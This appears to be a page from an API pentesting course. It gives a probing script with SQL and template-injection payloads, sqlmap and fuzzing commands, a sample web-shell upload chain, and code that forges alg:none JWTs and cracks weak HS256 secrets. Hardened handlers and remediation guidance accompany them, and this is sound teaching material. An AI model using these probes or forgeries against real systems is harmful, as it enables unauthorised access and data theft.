Full API Pentest

🔥 Vibe Prompt

"Run an automated pentest on a target API. Check: auth, IDOR, rate limiting, mass assignment, injection."

import requests

BASE = "http://target.api.com"
VALID_TOKEN = "valid_token"   # token for the test account you control
MY_USER_ID = "current_user"   # that account's id, as the API reports it
AUTH = {"Authorization": f"Bearer {VALID_TOKEN}"}
findings = []

# 1. Auth bypass: a protected route must not serve content to a garbage token
r = requests.get(f"{BASE}/admin", headers={"Authorization": "Bearer invalid"})
if r.status_code == 200:
    findings.append("CRITICAL: Auth bypass - /admin served with an invalid token")

# 2. IDOR (Insecure Direct Object Reference): a neighbouring order id that belongs
#    to someone else and still comes back 200 means there is no ownership check
r = requests.get(f"{BASE}/api/orders/1", headers=AUTH)
if r.status_code == 200:
    r2 = requests.get(f"{BASE}/api/orders/2", headers=AUTH)
    if r2.status_code == 200 and r2.json().get("user_id") != MY_USER_ID:
        findings.append("HIGH: IDOR - can access other users' orders")

# 3. Rate limiting: 100 failed logins without a single 429 means online brute force works
limited = False
for _ in range(100):
    r = requests.post(f"{BASE}/api/login", json={"user": "admin", "pass": "wrong"})
    if r.status_code == 429:
        limited = True
        break
if not limited:
    findings.append("HIGH: No rate limiting on /api/login after 100 failed attempts")

# 4. Mass assignment: a 200 alone proves nothing; confirm that role actually changed
r = requests.post(f"{BASE}/api/user/profile",
                  json={"name": "test", "role": "admin"}, headers=AUTH)
if r.status_code == 200 and r.json().get("role") == "admin":
    findings.append("MEDIUM: Mass assignment - role parameter accepted")

# 5. Injection in API params: compare each payload against a benign baseline instead of
#    testing for the absence of the word "error". params= URL-encodes the payload, and an
#    automated run never sends destructive payloads such as DROP TABLE.
baseline = requests.get(f"{BASE}/api/search", params={"q": "test"})
injection_payloads = ["' OR 1=1--", "'", "${7*7}", "{{7*7}}"]
for payload in injection_payloads:
    r = requests.get(f"{BASE}/api/search", params={"q": payload})
    body, base = r.text.lower(), baseline.text.lower()
    if r.status_code >= 500 or ("sql" in body and "sql" not in base):
        findings.append(f"MEDIUM: Possible SQL injection (error-based signal): {payload!r}")
    elif "7*7" in payload and "49" in r.text and "49" not in baseline.text:
        findings.append(f"MEDIUM: Possible template injection (7*7 evaluated): {payload!r}")
    elif payload == "' OR 1=1--" and len(r.text) > 2 * len(baseline.text):
        findings.append("MEDIUM: Possible SQL injection (tautology returned more data)")

for f in findings:
    print(f"⚠️  {f}")

API Pentest Checklist

| Check | Tool |
|-------|------|
| Auth bypass | Burp Repeater |
| IDOR | Manual ID increment |
| Rate limiting | Bombardier |
| Mass assignment | Add unexpected fields |
| Injection | sqlmap |
| JWT | jwt_tool |

API Pentest Course Complete! 🎉

  • ✅ Recon
  • ✅ Auth Bypass
  • ✅ SQLi/NoSQLi
  • ✅ JWT/Session
  • ✅ Full Pentest

Key Points

  • Understand the core concepts thoroughly
  • Practice with hands-on code examples
  • Apply knowledge to real-world problems
  • Review and reinforce through exercises

Further Learning

  • Official documentation
  • Open source projects on GitHub
  • Community forums and discussions
  • Related courses and tutorials

Pentest Checklist

Reconnaissance

  • [ ] Enumerate subdomains (subfinder, amass)
  • [ ] Detect technology stack (wappalyzer, whatweb)
  • [ ] Find API documentation (Swagger, OpenAPI, GraphQL introspection)
  • [ ] Extract endpoints from JavaScript files (LinkFinder)
  • [ ] Check .well-known endpoints

Discovery

  • [ ] Fuzz API routes (Kiterunner, ffuf)
  • [ ] Identify authentication mechanisms
  • [ ] Discover hidden parameters (arjun)
  • [ ] Test HTTP methods on all endpoints
  • [ ] Check for CORS misconfiguration

Vulnerability Testing

  • [ ] SQL injection (sqlmap)
  • [ ] NoSQL injection (manual payloads)
  • [ ] XSS (dalfox)
  • [ ] IDOR (manual + automated)
  • [ ] Mass assignment (test extra fields)
  • [ ] JWT attacks (jwt_tool)
  • [ ] Rate limiting bypass
  • [ ] SSRF (test redirects, internal services)
  • [ ] Path traversal
  • [ ] Server-side template injection

Exploitation

  • [ ] Extract sensitive data
  • [ ] Escalate privileges
  • [ ] Access other users' data
  • [ ] Document proof of concept

Reporting

  • [ ] Write executive summary
  • [ ] Detail each finding with CVSS score
  • [ ] Include request/response evidence
  • [ ] Provide remediation steps
  • [ ] Prioritize by severity

Sample Exploitation Chain

1. Discovery: Found /api/upload endpoint via fuzzing
2. Testing: Uploaded PHP file, got 403 (extension blocked)
3. Bypass: Changed extension to .php5, got 200
4. Access: Accessed uploaded file at /uploads/shell.php5
5. Escalation: Executed commands on server
6. Impact: Full database access, 50k records extracted
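
The bypass in step 3 works because the server checks a denylist of extensions and `.php5` (like `.phtml` or an upper-case `.PHP`) is not on it. The example below is added for this page, not code from any project: it puts that denylist check beside an allowlist check that also strips client-supplied paths, rejects double extensions, and inspects the file's leading bytes, then renames the stored file. The allowed types, their magic bytes and the file names are assumptions constructed for the demo.

```python
import os
import posixpath
import secrets

# Denylist of the kind step 2 of the chain above ran into (assumption: only '.php' is listed).
BLOCKED = {".php"}

# Allowlist: extension -> bytes the content must start with (constructed for the demo).
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
    ".pdf": b"%PDF-",
}


def upload_allowed_denylist(filename: str) -> bool:
    """The 403-on-.php check: anything that is not literally '.php' goes through."""
    _, ext = os.path.splitext(filename)
    return ext not in BLOCKED


def upload_allowed_allowlist(filename: str, content: bytes) -> bool:
    """Allowlist on a normalised extension plus a content check on the bytes."""
    name = posixpath.basename(filename.replace("\\", "/"))  # drop any path the client sent
    parts = name.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False  # no extension, or a double extension such as shell.php.jpg
    magic = ALLOWED.get("." + parts[1])
    return magic is not None and content.startswith(magic)


def stored_name(filename: str) -> str:
    """Never reuse the client's name: random token plus the (already validated) extension."""
    ext = "." + filename.lower().rsplit(".", 1)[1]
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    for probe in ["shell.php", "shell.php5", "shell.PHP", "shell.php.jpg", "pic.png"]:
        print(f"{probe:14} denylist={upload_allowed_denylist(probe)!s:5} "
              f"allowlist={upload_allowed_allowlist(probe, b'<?php system($_GET[0]); ?>')}")
```

Note that the allowlist version still rejects `pic.png` when the bytes are PHP source: the extension alone is never the decision, and the stored name means an attacker cannot predict the path from step 4 of the chain.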

Summary

A complete pentest follows a structured methodology: recon, discovery, vulnerability testing, exploitation, and reporting. Each finding includes evidence and remediation.

Key takeaways:

  • Methodology: recon -> discovery -> vulnerability testing -> exploitation -> reporting
  • Tools: subfinder, kiterunner, sqlmap, jwt_tool, ffuf, burp suite
  • Exploitation chain: find endpoint -> test -> bypass -> access -> escalate
  • Reporting: executive summary, detailed findings with CVSS, evidence, remediation

You have completed the API security pentesting course.

Remediation Timeline

| Priority | Timeline | Actions |
|----------|----------|---------|
| Critical | 24 hours | Fix SQL injection, mass assignment |
| High | 1 week | Add rate limiting, JWT hardening |
| Medium | 2 weeks | Add security headers, input validation |
| Low | 1 month | Server hardening, documentation |
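
For the mass assignment and IDOR rows, the fix lives in the handler: a field allowlist for writes and an ownership check for reads. The following is an added example, not code from the page's target or from any project, showing the vulnerable and hardened versions of the profile-update and order-lookup handlers that the script at the top of the page probes. The in-memory `SEED_USERS`/`SEED_ORDERS` data and the `PROFILE_WRITABLE` set are constructed for the demo.

```python
import copy

# Constructed in-memory data standing in for the database.
SEED_USERS = {
    "alice": {"name": "Alice", "email": "alice@example.com", "role": "user"},
    "bob": {"name": "Bob", "email": "bob@example.com", "role": "user"},
}
SEED_ORDERS = {
    1: {"user_id": "alice", "item": "keyboard"},
    2: {"user_id": "bob", "item": "monitor"},
}

PROFILE_WRITABLE = {"name", "email"}  # what a user may change about themselves


def fresh_store():
    """Fresh copies so the vulnerable handler cannot poison a later call."""
    return copy.deepcopy(SEED_USERS), copy.deepcopy(SEED_ORDERS)


# --- Mass assignment ---------------------------------------------------------

def update_profile_vulnerable(users, current_user, payload):
    """Binds every JSON key straight onto the record, so 'role' is writable by the client."""
    users[current_user].update(payload)
    return users[current_user]


def update_profile_hardened(users, current_user, payload):
    """Rejects keys outside the allowlist. Rejecting rather than silently dropping them
    turns the probe into a 4xx that shows up in logs."""
    rejected = set(payload) - PROFILE_WRITABLE
    if rejected:
        raise PermissionError(f"fields not writable: {sorted(rejected)}")
    users[current_user].update(payload)
    return users[current_user]


# --- IDOR ----------------------------------------------------------------------

def get_order_vulnerable(orders, current_user, order_id):
    """Authenticates the caller (current_user is known) but never checks ownership."""
    return orders.get(order_id)


def get_order_hardened(orders, current_user, order_id):
    """Ownership check. 'Not yours' and 'does not exist' give the same answer, so the
    endpoint is not an oracle for which ids are live."""
    order = orders.get(order_id)
    if order is None or order["user_id"] != current_user:
        return None
    return order


if __name__ == "__main__":
    users, orders = fresh_store()
    print(update_profile_vulnerable(users, "alice", {"name": "test", "role": "admin"}))
    print(get_order_vulnerable(orders, "alice", 2))
    users, orders = fresh_store()
    print(get_order_hardened(orders, "alice", 2))
    try:
        update_profile_hardened(users, "alice", {"name": "test", "role": "admin"})
    except PermissionError as exc:
        print(exc)
```

With the hardened handlers, probes 2 and 4 of the script above come back as a 403/404 and the `role` field stays `user`, which is the evidence to attach to the retest.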

Full Pentest Commands Reference

# 1. Recon
subfinder -d example.com | httpx

# 2. Discovery
ffuf -w api-endpoints.txt -u https://api.example.com/FUZZ

# 3. SQL Injection
sqlmap -u "https://api.example.com/users?id=1" --batch --dbs

# 4. XSS
dalfox url https://api.example.com/search?q=test

# 5. JWT
jwt_tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

# 6. IDOR
for id in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" -H "Authorization: Bearer $TOKEN" "https://api.example.com/api/users/$id"; done | sort | uniq -c

# 7. Rate Limiting
for i in {1..200}; do curl -s -o /dev/null -w "%{http_code}\n" https://api.example.com/api/public; done | sort | uniq -c
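
For the jwt_tool step above and the "JWT hardening" row of the remediation table, here is an added example (not part of the page and not jwt_tool's code) that does in plain Python the two checks jwt_tool automates on that sample token: an `alg: none` forgery, as jwt_tool's `-X a` produces, against a verifier that trusts the header versus one that pins the algorithm, and a wordlist check for a guessable HS256 secret, as `-C -d` does. The token is the one from the command above (jwt.io's demo token); the wordlist is constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# The HS256 sample token from the jwt_tool command above.
SAMPLE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
    "SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
)

# Constructed wordlist; a real run would read a file such as rockyou.txt.
WORDLIST = ["secret", "password", "changeme", "your-256-bit-secret", "jwt_secret"]


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def forge_alg_none(token: str, **claims) -> str:
    """Attacker side: rewrite claims, set alg to none and drop the signature."""
    _, payload_seg, _ = token.split(".")
    payload = json.loads(b64url_decode(payload_seg))
    payload.update(claims)
    header = b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{header}.{body}."


def verify_vulnerable(token: str, key: bytes) -> dict:
    """Lets the token's own header choose the algorithm, including 'none'."""
    header_seg, payload_seg, sig_seg = token.split(".")
    alg = json.loads(b64url_decode(header_seg)).get("alg")
    if alg == "none":
        return json.loads(b64url_decode(payload_seg))
    expected = hmac.new(key, f"{header_seg}.{payload_seg}".encode(), hashlib.sha256).digest()
    if alg == "HS256" and hmac.compare_digest(expected, b64url_decode(sig_seg)):
        return json.loads(b64url_decode(payload_seg))
    raise ValueError("invalid signature")


def verify_hardened(token: str, key: bytes) -> dict:
    """Pins HS256 server-side; the header may only confirm it, never select it."""
    header_seg, payload_seg, sig_seg = token.split(".")
    if json.loads(b64url_decode(header_seg)).get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(key, f"{header_seg}.{payload_seg}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_seg)):
        raise ValueError("invalid signature")
    return json.loads(b64url_decode(payload_seg))


def crack_hs256_secret(token: str, wordlist) -> Optional[str]:
    """Offline check: does any candidate key reproduce the token's signature?"""
    header_seg, payload_seg, sig_seg = token.split(".")
    signing_input = f"{header_seg}.{payload_seg}".encode()
    target = b64url_decode(sig_seg)
    for candidate in wordlist:
        mac = hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return candidate
    return None


if __name__ == "__main__":
    secret = crack_hs256_secret(SAMPLE_TOKEN, WORDLIST)
    print("recovered secret:", secret)
    forged = forge_alg_none(SAMPLE_TOKEN, sub="admin")
    print("vulnerable verifier accepts forged sub:", verify_vulnerable(forged, b"irrelevant")["sub"])
    try:
        verify_hardened(forged, b"irrelevant")
    except ValueError as exc:
        print("hardened verifier:", exc)
```

The two remediations this demonstrates are the ones to write into the High row: the server decides the algorithm (and the key for it) before looking at the token, and HS256 secrets must be long random values, not a dictionary word that a wordlist pass recovers in milliseconds.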

Next Steps

| Activity | Description |
|----------|-------------|
| Practice | Set up a vulnerable API lab (DVWA, WebGoat) |
| Certifications | Take GPEN, OSCP, or PNPT |
| Bug Bounties | Apply skills on HackerOne, Bugcrowd |
| Build Tools | Create your own pentest automation scripts |

You have completed the course. You now understand API security pentesting from reconnaissance to reporting.
